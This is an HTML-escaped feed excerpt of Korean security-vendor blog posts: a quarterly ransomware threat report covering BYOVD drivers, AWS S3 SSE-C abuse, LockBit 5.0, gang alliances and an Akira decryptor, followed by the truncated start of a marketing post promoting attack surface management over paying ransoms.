&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;안녕하세요!  이스트시큐리티&amp;nbsp;시큐리티&amp;nbsp;대응센터(ESRC)입니다. &amp;nbsp;  &amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;2025년 4분기 자사 백신 프로그램 &amp;lsquo;알약&amp;rsquo;에 탑재되어 있는 &amp;lsquo;랜섬웨어 행위기반 사전 차단&amp;rsquo; 기능을 통해 총59,162건의 랜섬웨어 공격을 차단했으며, 이를 일간 기준으로 환산하면 일 평균&amp;nbsp;643건의 랜섬웨어 공격을 차단한 것으로 볼 수 있습니다.      &amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;이번 통계는 개인 사용자를 대상으로 무료 제공하는 공개용 알약 백신프로그램의 &amp;lsquo;랜섬웨어 행위기반 사전 차단 기능&amp;rsquo;을 통해 차단된 공격만을 집계한 결과입니다.  &amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;다음은 ESRC에서 선정한 2025년 4분기 주요 랜섬웨어 동향입니다.   &amp;nbsp;&lt;br /&gt;&lt;br /&gt;1)&amp;nbsp;BYOVD&amp;nbsp;기법을&amp;nbsp;활용한&amp;nbsp;랜섬웨어&amp;nbsp;공격&amp;nbsp;주의&amp;nbsp; &lt;br /&gt;2)&amp;nbsp;클라우드&amp;nbsp;인프라와&amp;nbsp;AWS&amp;nbsp;S3&amp;nbsp;스토리지,&amp;nbsp;새로운&amp;nbsp;공격&amp;nbsp;대상으로&amp;nbsp;부상&amp;nbsp; &lt;br /&gt;3)&amp;nbsp;LockBit&amp;nbsp;5.0의&amp;nbsp;등장&amp;nbsp; &lt;br /&gt;4)&amp;nbsp;랜섬웨어&amp;nbsp;조직들의&amp;nbsp;전략적&amp;nbsp;동맹&amp;nbsp; &lt;br /&gt;5)&amp;nbsp;Akira&amp;nbsp;랜섬웨어&amp;nbsp;변종&amp;nbsp;복호화&amp;nbsp;툴&amp;nbsp;공개&amp;nbsp; &lt;br /&gt;&lt;br /&gt;랜섬웨어의 공격조직들이 BYOVD(Bring Your Own Vulnerable Driver) 기법을 사용하여 보안 솔루션을 종료하거나 무력화 시키고 있어 주의가 필요합니다.&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;BYOVD(Bring Your Own Vulnerable Driver)는 합법적 서명을 포함하고 있지만 취약점이 존재하는 드라이버를 공격에 활용하는 공격 기법으로, 공격자가 공격에 성공하면 커널 수준의 권한상승이 가능하여 시스템에 대한 최고 수준의 접근 및 제어권한을 확보할 수 있습니다.&amp;nbsp;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Qilin 랜섬웨어 공격자들은 BYOVD 공격을 위해 2015년에 컴파일 및 서명된 취약한 Windows 커널 드라이버 TPwSav.sys를 공격 툴에 추가하였으며, DeadLock 랜섬웨어는 CVE-2024-51324 취약점이 존재하는 Baidu 백신 드라이버인 BdApiUtil.sys를 공격에 활용하여 Baidu EDR을 비활성화 하고 이후 권한상승, 보안 및 백업 시스템 및 섀도우 복사본을 삭제하는 파워쉘 스크립트를 실행하기도 했습니다.&amp;nbsp; BYOVD 기법을 활용한 공격 사례는 2026년에도 지속될 것으로 예상됩니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;기업들의&amp;nbsp;운영환경이&amp;nbsp;클라우드로&amp;nbsp;이전됨에&amp;nbsp;따라,&amp;nbsp;랜섬웨어의&amp;nbsp;공격&amp;nbsp;타깃도&amp;nbsp;Amazon&amp;nbsp;S3와&amp;nbsp;같은&amp;nbsp;클라우드&amp;nbsp;스토리지로&amp;nbsp;확대되고&amp;nbsp;있습니다.&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;2025년 1월, AWS의 고객제공키(SSE-C) 기능을 악용하여 데이터를 암호화 하는 CodeFinger랜섬웨어가 발견되었습니다.&amp;nbsp;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;SSE-C는 AWS S3 환경에서 고객이 직접 암호키 생성, 데이터 암호화 하는 방식으로, 암호화키를 고객만 보유하고 있기 때문에 데이터에 대한 데이터의 소유와 관리를 모두 직접 진행할 수 있습니다. 공격자는&amp;nbsp;다양한&amp;nbsp;경로로&amp;nbsp;AWS접속에&amp;nbsp;필요한&amp;nbsp;액세스&amp;nbsp;키나&amp;nbsp;계정정보를&amp;nbsp;찾아&amp;nbsp;접속권한을&amp;nbsp;획득하며,&amp;nbsp;접속성공&amp;nbsp;후&amp;nbsp;SSE-C&amp;nbsp;기능을&amp;nbsp;악용하여&amp;nbsp;고객&amp;nbsp;데이터를&amp;nbsp;암호화&amp;nbsp;한&amp;nbsp;후&amp;nbsp;복호화를&amp;nbsp;위한&amp;nbsp;대칭형&amp;nbsp;AES-256키를&amp;nbsp;제공하는&amp;nbsp;대가로&amp;nbsp;금전을&amp;nbsp;요구합니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;11월에는 TrendMicro는 잠재적으로 랜섬웨어가 AWS S3에 저장된 사용자 데이터를 공격할 수 있는 기술들에 대한 보고서를 공개했습니다. 이 보고서를 통해 기본 관리형 키 악용 (Default AWS KMS Keys), 고객 제공 키 악용 (SSE-C), 데이터 유출 후 삭제 (Exfiltration and Deletion), 외부 키 재료 주입 (External Key Material Import), 외부 키 스토어 활용 (External Key Store, XKS) 등 실제 공격에 활용될 수 있는 5가지 방법들에 대해 상세히 기술하였으며, 클라우드 인프라 역시 더 이상 랜섬웨어의 안전지대가 아님을 경고하였습니다. &amp;nbsp;&amp;nbsp;&lt;br /&gt;&lt;br /&gt;LockBit 5.0이 등장하였습니다.&lt;br /&gt;&lt;br /&gt;LockBit 랜섬웨어 그룹은 2024년 초, 국제 수사 집행기관들이 함께 협력하여 진행한 Operation Cronos 작전으로 인해 그룹의 인프라 상당부분이 타격을 입고 영향력이 크게 약화되며 활동이 중단된 듯 하였습니다. 하지만&amp;nbsp;2025년&amp;nbsp;9월&amp;nbsp;초,&amp;nbsp;LockBit은&amp;nbsp;공식적으로&amp;nbsp;복귀를&amp;nbsp;발표하며&amp;nbsp;화려하게&amp;nbsp;귀환하였습니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;LockBit 5.0 버전은 Windows, Linux 및 ESXi 서버를 주요 공격 대상으로 삼습니다. 파일 암호화 완료 후 무작위로 생성된 16자리의 확장자를 추가하는 것이 특징이며, 기존 암호화 파일 뒤에 붙이던 .lockbit과 같은 고유 마커를 의도적으로 삭제하여 흔적을 지움으로써 보안 솔루션의 탐지와 초기 대응을 어렵게 만듭니다. 또한 기존 분산형 토르(Tor) 인프라와 P2P 기반 암호화 메신저인 Tox IDs를 추가 도입하여, 수사기관 차단을 대비해 협상 및 통신이 더욱 용이할 수 있도록 업그레이드 되었습니다.&amp;nbsp;LockBit 5.0은 이미 수십명의 피해자를 발생시켰으며, 활발한 공격 활동을 이어나갈 것으로 전망됩니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;2025년 10월, LockBit, Qilin, DragonForce 랜섬웨어 조직들이 전략적 동맹을 발표했습니다.&amp;nbsp;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;전략적 동맹을 통해 랜섬웨어는 더 이상 단일 조직으로 분류되는 것이 아닌, 혼합된 전술을 사용하고 서로의 인프라를 상호 공유하는 분산형 랜섬웨어 공급망 구조로 진화하였습니다. 또한 '오퍼레이션 크로노스(Operation Cronos)'와 같은 국제적 인프라 타격 작전 이후에도 공격을 지속할 수 있는 높은 회복 탄력성도 갖추게 되었습니다. 이러한&amp;nbsp;변화에&amp;nbsp;따라&amp;nbsp;2026년에는&amp;nbsp;랜섬웨어&amp;nbsp;조직들의&amp;nbsp;활동이&amp;nbsp;더욱&amp;nbsp;활발해지고,&amp;nbsp;공격의&amp;nbsp;범위와&amp;nbsp;파급력&amp;nbsp;또한&amp;nbsp;한층&amp;nbsp;확대될&amp;nbsp;것으로&amp;nbsp;전망됩니다.&lt;br /&gt;&lt;br /&gt;Akira 랜섬웨어 변종 복호화 툴이 공개되었습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;리눅스 및 ESXi 서버를 대상으로 한 Akira 랜섬웨어 변종이 파일별 고유 암호화 키를 생성하는 과정에서 무작위 값이 아닌 시스템의 나노초 단위 타임스탬프를 시드값으로 사용한다는 점이 확인되었습니다. 이러한 키 생성 방식의 취약점으로 인해 NVIDIA GPU의 대규모 병렬 처리 성능을 활용한 초당 수십억 개의 시드값 대입이 가능해 졌으며,&amp;nbsp;브루트포스 방식으로 복호화키를 추측할 수 있게 되었습니다. 그 결과 복호화 툴이 성공적으로 개발되었습니다. 해당 작업은 일반적인 CPU를 활용하면 수 년이 소요되는 수준이었습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;이번&amp;nbsp;복호화&amp;nbsp;툴의&amp;nbsp;개발은&amp;nbsp;최신&amp;nbsp;하드웨어&amp;nbsp;기술을&amp;nbsp;활용하여&amp;nbsp;랜섬웨어&amp;nbsp;공격자의&amp;nbsp;암호화&amp;nbsp;전략을&amp;nbsp;무력화&amp;nbsp;했다는&amp;nbsp;점에서&amp;nbsp;큰&amp;nbsp;의미가&amp;nbsp;있으며,&amp;nbsp;최신&amp;nbsp;컴퓨팅&amp;nbsp;자원을&amp;nbsp;전략적으로&amp;nbsp;활용하여&amp;nbsp;지능적&amp;nbsp;위협에&amp;nbsp;대응할&amp;nbsp;수&amp;nbsp;있다는&amp;nbsp;점을&amp;nbsp;입증한&amp;nbsp;사례로&amp;nbsp;평가받고&amp;nbsp;있습니다.&amp;nbsp; &lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;랜섬웨어는 특정 조직에 국한되지 않는 분산된 공급망 형태로 진화중에 있으며, 전방위적인 공격 타깃 확장과 더불어 지능화된 기술을 통해 기존 방어 체계를 위협하고 있습니다. 이에 보안담당자 여러분들께서는 조직 자산에 대한 접근 권한 관리를 강화하고 오프라인 백업 체계 구축을 통해 진화하는 랜섬웨어 위협으로부터 피해를 최소화할 수 있도록 대비해야 하겠습니다.&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;span data-phocus=&quot;https://blog.kakaocdn.net/dna/cuOOe5/btsNbNl4ZC0/AAAAAAAAAAAAAAAAAAAAANX_6QFDCyOmm6I41TvunZ6iLgkPl4Pg_btPJCPBoRl4/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&amp;amp;expires=1769871599&amp;amp;allow_ip=&amp;amp;allow_referer=&amp;amp;signature=pJXjHF7nJytEBYYj6%2FC02Bhex4A%3D&quot; data-url=&quot;https://blog.kakaocdn.net/dna/cuOOe5/btsNbNl4ZC0/AAAAAAAAAAAAAAAAAAAAANX_6QFDCyOmm6I41TvunZ6iLgkPl4Pg_btPJCPBoRl4/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&amp;amp;expires=1769871599&amp;amp;allow_ip=&amp;amp;allow_referer=&amp;amp;signature=pJXjHF7nJytEBYYj6%2FC02Bhex4A%3D&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;[크기변환]랜섬웨어.png&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ulLaq/dJMcahpC1wW/zVKx9tpTcyzyMkaOmoM950/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ulLaq/dJMcahpC1wW/zVKx9tpTcyzyMkaOmoM950/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ulLaq/dJMcahpC1wW/zVKx9tpTcyzyMkaOmoM950/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FulLaq%2FdJMcahpC1wW%2FzVKx9tpTcyzyMkaOmoM950%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;400&quot; height=&quot;150&quot; data-filename=&quot;[크기변환]랜섬웨어.png&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;color: #444444; text-align: justify;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>전문가 기고</category>
      <author>알약4</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5702</guid>
      <comments>https://alyacofficialblog.tistory.com/5702#entry5702comment</comments>
      <pubDate>Thu, 15 Jan 2026 14:59:38 +0900</pubDate>
    </item>
    <item>
      <title>기업의 랜섬웨어 대응 전략의 변화: &amp;lsquo;지불&amp;rsquo;에서 &amp;lsquo;ASM(공격표면관리)&amp;rsquo;로!</title>
      <link>https://alyacofficialblog.tistory.com/5701</link>
      <description>&lt;p style=&quot;text-align: right;&quot; data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light'; background-color: #eeeeee; color: #333333; text-align: start;&quot;&gt;by 이스트시큐리티 마케팅팀&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;안녕하세요, 이스트시큐리티입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;랜섬웨어 공격을 당했을 때 '몸값만 지불하면 데이터는 되찾을 수 있다'는 인식은 이제 더 이상 유효하지 않습니다. 글로벌 보안 조사 기업 &lt;i&gt;CyberEdge Group&lt;/i&gt;이 발표한 &lt;u&gt;&lt;i&gt;2025년 사이버 위협 방어 보고서&lt;/i&gt;&lt;/u&gt;에 따르면, 랜섬웨어 몸값을 지불한 기업 중 실제로 데이터를 복구한 비율은 54.3%에 그쳤습니다. 이는 불과 2년 전인 2023년의 72.7%에서 급격히 하락한 수치입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이 결과는 하나의 분명한 사실을 보여줍니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;랜섬웨어 공격자에게 &amp;lsquo;지불&amp;rsquo;은 더 이상 해결책이 아니라, 불확실한 선택지가 되었다는 점&lt;/b&gt;입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 2034384084.png&quot; data-origin-width=&quot;1300&quot; data-origin-height=&quot;731&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/wsVtu/dJMcajt8YO2/AF5FujbJS0QKa2kor4Q7k1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/wsVtu/dJMcajt8YO2/AF5FujbJS0QKa2kor4Q7k1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/wsVtu/dJMcajt8YO2/AF5FujbJS0QKa2kor4Q7k1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FwsVtu%2FdJMcajt8YO2%2FAF5FujbJS0QKa2kor4Q7k1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1300&quot; height=&quot;731&quot; data-filename=&quot;Group 2034384084.png&quot; data-origin-width=&quot;1300&quot; data-origin-height=&quot;731&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;변화한 보안 표준 - '조공은 없다'&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;보고서는 최근 기업 보안 정책의 변화도 함께 짚고 있습니다. 점점 더 많은 조직이 '단 1센트도 지불하지 않는다(Millions for defense, but not one cent for tribute)'는 원칙을 채택하고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;그 배경에는 명확한 이유가 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;&lt;b&gt;첫째, 복호화 도구의 품질과 신뢰도가 급격히 낮아졌습니다.&lt;/b&gt;&lt;br /&gt;몸값을 지불해도 정상적인 복호화가 되지 않거나, 일부 데이터만 복구되는 사례가 빈번하게 보고되고 있습니다.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;둘째,&amp;nbsp;데이터 비공개 약속이 지켜지지 않는 경우가 늘고 있습니다.&lt;/b&gt;&lt;br /&gt;지불 이후에도 탈취된 정보가 다크웹에 유출되거나, 2차 협박으로 이어지는 사례가 증가하고 있습니다.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;셋째,&amp;nbsp;사이버 보험과 규제 환경의 변화입니다.&lt;/b&gt;&lt;br /&gt;일부 보험사는 랜섬웨어 몸값 지불을 보장 대상에서 제외하고 있으며, 특정 공격 그룹에 대한 지불을 법적으로 제한하는 국가도 늘고 있습니다.&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이제 기업에게 랜섬웨어 대응은 &amp;lsquo;지불 여부&amp;rsquo;의 문제가 아니라, 사전에 얼마나 대비했는지의 문제로 이동하고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;확장되는 공격, 폭발적으로 증가하는 관리 범위&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;CyberEdge 보고서가 특히 주목한 변화는 &lt;b&gt;공격 표면(Attack Surface)의 급격한 확장&lt;/b&gt;입니다. 과거에는 중요한 데이터와 시스템이 사내 서버나 파일 서버에 집중돼 있었다면, 이제는 상황이 완전히 달라졌습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;클라우드 서비스와 SaaS 환경&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;원격 근무를 위한 개인&amp;middot;모바일 기기&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;외주&amp;middot;협력사 계정과 접근 권한&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;웹&amp;middot;모바일 애플리케이션과 API&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;IoT 및 산업용 디바이스&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;보고서에 따르면, &lt;b&gt;모바일 및 웹 애플리케이션 취약점&lt;/b&gt;은 전체 응답 기업의 &lt;u&gt;90.9%&lt;/u&gt;에서&lt;b&gt; 주요 보안 위협 요인&lt;/b&gt;으로 작용하고 있으며, 개인정보 탈취&amp;middot;계정 탈취&amp;middot;결제 사기 등 지능형 범죄의 핵심 경로로 악용되고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;문제는 이 모든 환경이 한눈에 보이지 않는 상태로 운영되고 있다는 점입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;핵심 보안 영역으로 떠오르는 &amp;lsquo;공격 표면 관리(ASM)&amp;rsquo;&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;CyberEdge는 2025년 보안 트렌드 중 하나로&lt;b&gt; ASM(Attack Surface Management)&lt;/b&gt;를 명확히 지목합니다. 공격 표면이 커질수록, '무엇을 보호해야 하는지 아는 것'이 가장 중요한 보안 역량이 되기 때문입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;ASM은 단순한 취약점 스캔이 아닙니다. 공격자가 실제로 바라보는 관점에서, 조직 외부에 노출된 모든 자산을 식별하고 관리하는 보안 전략입니다. 보고서는 공격 표면이 하나의 거대한 덩어리가 아니라, 성격이 다른 다수의 공격 표면으로 분화되고 있다고 지적합니다. 이 변화에 대응하지 못한다면, 랜섬웨어&amp;middot;계정 탈취&amp;middot;데이터 유출은 언제든 반복될 수 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;  &lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;i&gt;Plus Tip&lt;/i&gt;.&lt;/span&gt; 공격 표면이 보이지 않으면, 대응도 불가능합니다&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이러한 흐름 속에서, 기업이 가장 먼저 점검해야 할 질문은 이것입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&amp;ldquo;우리 조직은 어디서 공격당할 수 있는가?&amp;rdquo;&lt;/span&gt;&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이스트시큐리티의 &lt;a href=&quot;https://www.estsecurity.com/enterprise/product/asm&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;&lt;b&gt;알약 ASM&lt;/b&gt;&lt;/a&gt;은 기업 외부에 노출된 공격 표면을 자동으로 식별하고, 실제 위협 가능성이 높은 지점을 우선순위 기반으로 관리할 수 있도록 설계된 공격 표면 관리 솔루션입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
